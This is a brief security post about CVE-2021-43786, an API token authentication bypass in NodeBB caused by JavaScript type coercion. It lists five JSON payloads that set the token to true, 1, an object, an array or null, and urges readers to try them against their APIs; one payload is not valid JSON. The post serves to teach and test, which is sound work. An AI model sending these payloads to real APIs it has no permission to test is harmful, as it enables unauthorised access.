NodeBB API token auth bypass CVE-2021-43786
Here is a great example of an API token validation vulnerability caused by type casting. Can you spot the bug in the code from this fix?
In JavaScript, values such as true, false, null, and undefined are distinct types, and loose comparisons coerce between them.
That's why all these type casting tricks work so well against real-world APIs:
{"api-token": true}
{"api-token": 1}
{"api-token": {"bypass"}}
{"api-token": [true]}
{"api-token": null}
I highly recommend that you check your APIs right now with the payloads above ;)